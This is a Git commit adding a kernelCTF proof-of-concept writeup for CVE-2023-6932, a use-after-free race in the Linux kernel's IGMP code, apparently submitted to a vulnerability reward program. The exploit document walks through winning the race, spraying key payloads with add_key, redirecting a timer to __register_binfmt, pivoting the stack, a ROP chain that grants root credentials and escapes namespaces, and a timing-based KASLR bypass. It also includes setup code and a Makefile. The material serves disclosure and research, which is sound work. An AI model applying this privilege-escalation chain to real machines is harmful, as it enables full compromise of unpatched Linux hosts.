* Add CVE-2023-6932

* Minor documentation tweaks
liona24 authored May 29, 2024
1 parent 822fee1 commit 422d0c3
Showing 9 changed files with 1,205 additions and 0 deletions.
217 changes: 217 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-6932_cos/docs/exploit.md
@@ -0,0 +1,217 @@
## Triggering the Vulnerability

In `igmp_heard_query` in `net/ipv4/igmp.c`, a timer is armed for each group
membership upon receiving an IGMP query ([2]):

```c
static bool igmp_heard_query(struct in_device *in_dev, struct sk_buff *skb,
	int len)
{
	struct ip_mc_list *im;
	// ...
	rcu_read_lock();
	for_each_pmc_rcu(in_dev, im) {
		int changed;

		// ...

		spin_lock_bh(&im->lock); // [1.a]
		if (im->tm_running)
			im->gsquery = im->gsquery && mark;
		else
			im->gsquery = mark;
		changed = !im->gsquery ||
			igmp_marksources(im, ntohs(ih3->nsrcs), ih3->srcs);
		spin_unlock_bh(&im->lock); // [1.b]
		if (changed)
			igmp_mod_timer(im, max_delay); // [2]
	}
	rcu_read_unlock();
	// ...
}
```
While iterating over the `in_dev->mc_list` list, the `im` object may get dropped by a
concurrent thread in `__ip_mc_dec_group` ([3]):
```c
void __ip_mc_dec_group(struct in_device *in_dev, __be32 addr, gfp_t gfp)
{
	struct ip_mc_list *i;
	struct ip_mc_list __rcu **ip;
	ASSERT_RTNL();
	for (ip = &in_dev->mc_list;
	     (i = rtnl_dereference(*ip)) != NULL;
	     ip = &i->next_rcu) {
		if (i->multiaddr == addr) {
			if (--i->users == 0) {
				// ...
				ip_ma_put(i); // [3]
				return;
			}
			break;
		}
	}
}
```

If the reference count of the object drops to zero, the object is queued to be
freed after an RCU grace period.
This is problematic because `igmp_mod_timer` (via `igmp_start_timer`) will arm
the timer even if the reference count is already zero ([4]):
```c
static void igmp_start_timer(struct ip_mc_list *im, int max_delay)
{
	int tv = prandom_u32() % max_delay;

	im->tm_running = 1;
	if (!mod_timer(&im->timer, jiffies+tv+2)) // [4]
		refcount_inc(&im->refcnt); // [5]
}
```
Our goal is to contend `im->lock` at [1.a] while `__ip_mc_dec_group` runs
concurrently, in order to hit the race.
We contend the lock by repeatedly sending large bursts of IGMP packets.
We further increase our chances of hitting the race by increasing the number of
members of the `in_dev->mc_list`.
There are a few ways to add members to the list. I chose the `IP_ADD_MEMBERSHIP`
`setsockopt()` call, which calls `ip_mc_join_group`, eventually reaching
`__ip_mc_join_group` and adding the corresponding members.
We can remove all the members by simply closing the socket fd (thus hitting
`__ip_mc_dec_group` for each one).
We will set up a virtual network for sending the IGMP packets. This requires
`CAP_NET_ADMIN`, which we obtain by entering a user namespace.
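
A minimal sketch of obtaining `CAP_NET_ADMIN` through a user namespace is shown below. The helper names are hypothetical and the exploit's real setup code may differ; the sketch only relies on `unshare(2)` and the standard `/proc/self/{setgroups,uid_map,gid_map}` files.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Format a single-entry id map line: "<inside> <outside> 1\n". */
static int format_id_map(char *buf, size_t len, unsigned inside, unsigned outside)
{
    assert(buf != NULL);
    int n = snprintf(buf, len, "%u %u 1\n", inside, outside);
    return (n > 0 && (size_t)n < len) ? n : -1;
}

/* Write a string to an existing file, returning 0 on success. */
static int write_file(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -1;
}

/*
 * Enter new user and network namespaces and map the caller to root inside.
 * Afterwards the process holds CAP_NET_ADMIN over the new network namespace.
 */
static int enter_net_sandbox(void)
{
    char map[64];
    unsigned uid = (unsigned)getuid();
    unsigned gid = (unsigned)getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0)
        return -1;
    /* setgroups must be denied before an unprivileged gid_map write. */
    if (write_file("/proc/self/setgroups", "deny") < 0)
        return -1;
    if (format_id_map(map, sizeof(map), 0, uid) < 0 ||
        write_file("/proc/self/uid_map", map) < 0)
        return -1;
    if (format_id_map(map, sizeof(map), 0, gid) < 0 ||
        write_file("/proc/self/gid_map", map) < 0)
        return -1;
    return 0;
}
```
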
Once we hit the race, the kernel logs a reference count saturation warning
(triggered at [5]).
This produces an observable timing difference when sending the packets, which
lets us deduce when we hit the race.
We will pin the main thread (which adds the group memberships) to one specific
CPU. The burst thread is allowed to be distributed freely in order to maximise
the burst potential.
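
Pinning the main thread could look like the sketch below. The helper names are illustrative assumptions; only `sched_getaffinity(2)` and `sched_setaffinity(2)` are real interfaces. The burst thread would simply skip this call and keep its default affinity.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>

/* Return the lowest CPU the calling thread may run on, or -1 on error. */
static int first_allowed_cpu(void)
{
    cpu_set_t set;

    CPU_ZERO(&set);
    if (sched_getaffinity(0, sizeof(set), &set) < 0)
        return -1;
    for (int cpu = 0; cpu < CPU_SETSIZE; cpu++)
        if (CPU_ISSET(cpu, &set))
            return cpu;
    return -1;
}

/* Restrict the calling thread (pid 0 means "self") to a single CPU. */
static int pin_to_cpu(int cpu)
{
    cpu_set_t set;

    assert(cpu >= 0 && cpu < CPU_SETSIZE);
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof(set), &set);
}
```
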
## Exploiting the Use-After-Free
### Stage 1
Our target object is the `struct ip_mc_list`, which resides in the `kmalloc-192`
cache and is allocated using `GFP_KERNEL`.
After the timer is registered on the freed object, we need to corrupt the
`struct timer_list timer` member at offset 64:
```c
struct timer_list {
	struct hlist_node entry;
	unsigned long expires;
	void (*function)(struct timer_list *);
	u32 flags;
};
```
Specifically, we target the `function` member, while taking some special
care of the list `entry` member.

For the sake of simplicity we use the `add_key` syscall (`__NR_add_key`) to
spray key payloads, giving us nearly full control of the payload.
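
To make the offsets concrete, the following userspace sketch mirrors the `struct timer_list` layout shown above and computes where `function` ends up. It assumes an x86-64 (LP64) build and the field order given in the text. The 24-byte key payload header (an `rcu_head` plus a padded `datalen`, as in `struct user_key_payload`) is an assumption about the spray primitive and is not stated in the original; all `*_model` names are made up for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userspace stand-ins for the kernel types (assumed LP64 layout). */
struct hlist_node_model {
    void *next;
    void **pprev;
};

struct timer_list_model {
    struct hlist_node_model entry;
    unsigned long expires;
    void (*function)(struct timer_list_model *);
    uint32_t flags;
};

/* Offset of `timer` inside `struct ip_mc_list`, taken from the text. */
#define TIMER_OFFSET_IN_OBJECT 64
/* Assumption: header that precedes the user-controlled key data. */
#define KEY_PAYLOAD_HEADER 24

/* Offset of timer.function counted from the start of the slab object. */
static size_t function_offset_in_object(void)
{
    return TIMER_OFFSET_IN_OBJECT + offsetof(struct timer_list_model, function);
}

/* Offset of timer.function counted from the start of the key data. */
static size_t function_offset_in_key_data(void)
{
    size_t off = function_offset_in_object();

    assert(off >= KEY_PAYLOAD_HEADER);
    return off - KEY_PAYLOAD_HEADER;
}
```

Under these assumptions the function pointer sits at offset 88 in the object, which is offset 64 in the key data.
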

The nature of the bug imposes two problems: 1) the payload size is limited
because we are in `kmalloc-192`, and 2) we are in an interrupt context
when the timer expires.
The function is invoked with the `struct timer_list *` pointer to the timer itself as its first argument.
Usually a developer would use this in conjunction with the `from_timer(..)` macro
to get the original container object. We will, however, use the pointer argument
to work around the mentioned problems by abusing the binfmt subsystem of the kernel.
We simply choose `__register_binfmt` as our timer function.
This function adds its first argument to the binfmt handler list and thus registers
our (corrupted) object as a `struct linux_binfmt *` that can be used later.
Unluckily, the RSI register, which carries the second argument (`insert`), holds a
leftover non-zero value, so our object is registered as the first binfmt handler.
We therefore have to hurry to clean it up and prepare it for the second stage;
otherwise another user of the binfmt list will likely panic the kernel.
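
The effect of the polluted second argument can be illustrated with a small userspace model. This is not kernel code: the list helpers and the `binfmt_model` type are simplified stand-ins written for this example. They mimic how `__register_binfmt(fmt, insert)` adds to the head of the list when `insert` is non-zero and to the tail otherwise.

```c
#include <assert.h>
#include <stddef.h>

/* Minimal circular doubly linked list, modelled on the kernel's list_head. */
struct list_head {
    struct list_head *next, *prev;
};

static void list_init(struct list_head *head)
{
    head->next = head->prev = head;
}

static void list_insert(struct list_head *node,
                        struct list_head *prev, struct list_head *next)
{
    next->prev = node;
    node->next = next;
    node->prev = prev;
    prev->next = node;
}

static void list_add(struct list_head *node, struct list_head *head)
{
    list_insert(node, head, head->next);      /* becomes first entry */
}

static void list_add_tail(struct list_head *node, struct list_head *head)
{
    list_insert(node, head->prev, head);      /* becomes last entry */
}

/* Simplified stand-in for struct linux_binfmt. */
struct binfmt_model {
    struct list_head lh;
    const char *name;
};

/* Model of the registration logic: any non-zero `insert` means "head". */
static void register_binfmt_model(struct list_head *formats,
                                  struct binfmt_model *fmt, int insert)
{
    if (insert)
        list_add(&fmt->lh, formats);
    else
        list_add_tail(&fmt->lh, formats);
}

/* First handler that a lookup would try, or NULL if the list is empty. */
static struct binfmt_model *first_format(struct list_head *formats)
{
    if (formats->next == formats)
        return NULL;
    return (struct binfmt_model *)((char *)formats->next -
                                   offsetof(struct binfmt_model, lh));
}
```

With regular handlers registered using `insert == 0`, a later registration with a garbage non-zero `insert` puts the fake entry in front of all of them, which is why every subsequent `execve` would reach the corrupted object first.
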

### Stage 2

Once the timer has expired, we free our key payload and immediately reclaim
it with the second-stage payload.
Again, we use the `add_key` syscall for this, this time to overwrite the object
with a fake `struct linux_binfmt`:

```c
/*
* This structure defines the functions that are used to load the binary formats that
* linux accepts.
*/
struct linux_binfmt {
	struct list_head lh;
	struct module *module;
	int (*load_binary)(struct linux_binprm *);
	int (*load_shlib)(struct file *);
	int (*core_dump)(struct coredump_params *cprm);
	unsigned long min_coredump; /* minimal dump size */
} __randomize_layout;
```

When executing a binary, the kernel looks through its binfmt handlers in
order to find the right interpreter. This happens in
`search_binary_handler(struct linux_binprm *bprm)` in `fs/exec.c`.
The handlers typically check for magic bytes (max 256) at the beginning of
the file. Luckily for us, the read of those bytes happens sufficiently close to
the actual call to `linux_binfmt.load_binary`. Therefore a pointer to the memory
that was read is still alive in a register (specifically RBX in this case).
We can use this gadget as a trivial stack pivot onto the file contents:
```s
0xffffffff816067e1:
push rbx
pop rsp
```

We then prepare another ROP payload in the file:
```c
// fixup the format list
rop_chain[j++] = pop_rsi;
rop_chain[j++] = formats - 8;
rop_chain[j++] = pop_rax;
rop_chain[j++] = (u64)payload->u.fmt.lh.next;
rop_chain[j++] = mov_qword_rsi8_rax;

// prepare a privesc payload
rop_chain[j++] = pop_rdi;
rop_chain[j++] = init_task;
rop_chain[j++] = prepare_kernel_cred;
rop_chain[j++] = mov_rdi_rax;
rop_chain[j++] = commit_creds;
rop_chain[j++] = pop_rdi;
rop_chain[j++] = 1;
rop_chain[j++] = find_task_by_vpid;
rop_chain[j++] = mov_rdi_rax;
rop_chain[j++] = pop_rsi;
rop_chain[j++] = init_nsproxy;
rop_chain[j++] = switch_task_namespaces;
rop_chain[j++] = __do_sys_fork;
rop_chain[j++] = pop_rdi;
rop_chain[j++] = 9999999;
rop_chain[j++] = __msleep;
```

Special care has to be taken to remove the handler from the binfmt
list first. After that we place a common privilege escalation payload.
Finally, we end the chain with `__do_sys_fork`, using the tele-fork technique
described [here](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/) to return to user space trivially.

With everything in place, we execute our file to trigger the payload.

## KASLR Bypass

In order to obtain a kernel pointer and bypass KASLR, we use a timing side
channel for simplicity.
The code for that is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h
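
The general shape of such a timing probe is sketched below. It is a hedged illustration and not the exploit's code. The candidate range (`0xffffffff80000000` to `0xffffffffc0000000` in 2 MiB steps) is the usual x86-64 kernel text randomization window and is assumed here. Treating the fastest prefetch as the mapped address is likewise an assumption, and the helper names are invented for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed x86-64 KASLR window for the kernel image. */
#define KASLR_START 0xffffffff80000000ull
#define KASLR_END   0xffffffffc0000000ull
#define KASLR_STEP  0x200000ull   /* 2 MiB alignment */
#define KASLR_SLOTS ((size_t)((KASLR_END - KASLR_START) / KASLR_STEP))

/* Candidate base address for a given slot index. */
static uint64_t slot_addr(size_t slot)
{
    assert(slot < KASLR_SLOTS);
    return KASLR_START + (uint64_t)slot * KASLR_STEP;
}

#if defined(__x86_64__)
static inline uint64_t rdtsc_fenced(void)
{
    uint32_t lo, hi;

    __asm__ volatile("mfence\n\trdtsc\n\tlfence"
                     : "=a"(lo), "=d"(hi) : : "memory");
    return ((uint64_t)hi << 32) | lo;
}

/* Time one pair of prefetches; prefetching never faults, even on kernel addresses. */
static inline uint64_t time_prefetch(uint64_t addr)
{
    uint64_t start = rdtsc_fenced();

    __asm__ volatile("prefetchnta (%0)\n\tprefetcht2 (%0)"
                     : : "r"(addr) : "memory");
    return rdtsc_fenced() - start;
}
#else
/* Non-x86 placeholder so the sketch still compiles. */
static inline uint64_t time_prefetch(uint64_t addr)
{
    (void)addr;
    return 0;
}
#endif

/* Pick the slot with the smallest (for example per-slot minimum) timing. */
static size_t pick_fastest_slot(const uint64_t *times, size_t n)
{
    size_t best = 0;

    assert(times != NULL && n > 0);
    for (size_t i = 1; i < n; i++)
        if (times[i] < times[best])
            best = i;
    return best;
}
```

In practice one would record the minimum of many `time_prefetch(slot_addr(i))` samples per slot before calling `pick_fastest_slot()`, since single measurements are noisy.
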

## Stability Notes

In low noise environments the exploit is relatively stable (~70-80% during local
testing).
On the remote instance the success chances drop significantly.
I assume this is due to more background activity combined with the fact that
the nature of the bug is very volatile.
13 changes: 13 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-6932_cos/docs/vulnerability.md
@@ -0,0 +1,13 @@
- Requirements:
  - Kernel configuration: CONFIG_IP_MULTICAST=y
  - Either:
    - Possibility to send IGMP packets
    - CAP_NET_ADMIN or user namespaces
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/ipv4/igmp.c?id=1da177e4c3f4
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=e2b706c691905fe78468c361aaabc719d0a496f1
- Affected Version: v2.6.12-rc2 - v6.7-rc7
- Affected Component: ipv4/igmp
- Syscall to disable: disallow unprivileged user namespaces
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-6932
- Cause: Use-After-Free
- Description: A use-after-free vulnerability in the Linux kernel's ipv4: igmp component can be exploited to achieve local privilege escalation. A race condition can be exploited to cause a timer to be mistakenly registered on an RCU read-locked object that is freed by another thread.
@@ -0,0 +1,3 @@

exploit: *.c
	$(CC) -O3 -ggdb -static -Wall -o exploit $^ -lpthread